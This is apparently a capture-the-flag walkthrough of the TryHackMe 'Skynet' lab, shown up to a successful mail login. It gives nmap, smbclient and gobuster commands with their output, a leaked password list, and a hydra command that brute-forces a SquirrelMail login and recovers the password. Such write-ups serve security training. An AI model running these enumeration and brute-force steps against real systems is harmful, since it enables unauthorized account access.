https://tryhackme.com/room/skynet
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA RESP-CODES SASL UIDL PIPELINING TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS ENABLE have ID IMAP4rev1 post-login OK LITERAL+ listed Pre-login capabilities SASL-IR LOGINDISABLEDA0001 IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-07-13T04:18:06
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\\x00
| Domain name: \\x00
| FQDN: skynet
|_ System time: 2022-07-12T23:18:06-05:00
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L ////10.10.244.1//
Password for [WORKGROUP\\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
First we tried to smbclient into anonymous using anonymous user and get some glimpse
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\\\\\10.10.244.1\\\\anonymous -U anonymous
Password for [WORKGROUP\\anonymous]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \\> get attention.txt
smb: \\> cd logs
smb: \\logs\\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
smb: \\> get log1.txt
Now we have attention.txt and log1.txt, others are all blank files with 0 bytes
┌──(kali㉿VirtualBox)-[~]
└─$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
┌──(kali㉿VirtualBox)-[~]
└─$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
We got the username milesdyson and a list of password, now we need to find somewhere to brute force, I tried SMB but that is not the place, so I gobuster fuzz the directory
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 10.10.244.1 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/admin (Status: 301) [Size: 310] [--> <http://10.10.244.1/admin/>]
/.hta (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/config (Status: 301) [Size: 311] [--> <http://10.10.244.1/config/>]
/css (Status: 301) [Size: 308] [--> <http://10.10.244.1/css/>]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 307] [--> <http://10.10.244.1/js/>]
/server-status (Status: 403) [Size: 276]
/squirrelmail (Status: 301) [Size: 317] [--> <http://10.10.244.1/squirrelmail/>]
The /squirrelmail looks sus
On the Inspect > Network tab we found the parameter we wanted for bruteforce
Now we will be using hydra to fill in the parameters
┌──(kali㉿VirtualBox)-[~]
└─$ hydra -l milesdyson -P log1.txt 10.10.244.1 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^:Unknown user or password incorrect."
[80][http-post-form] host: 10.10.244.1 login: milesdyson password: cyborg007haloterminator
After login, we found some emails
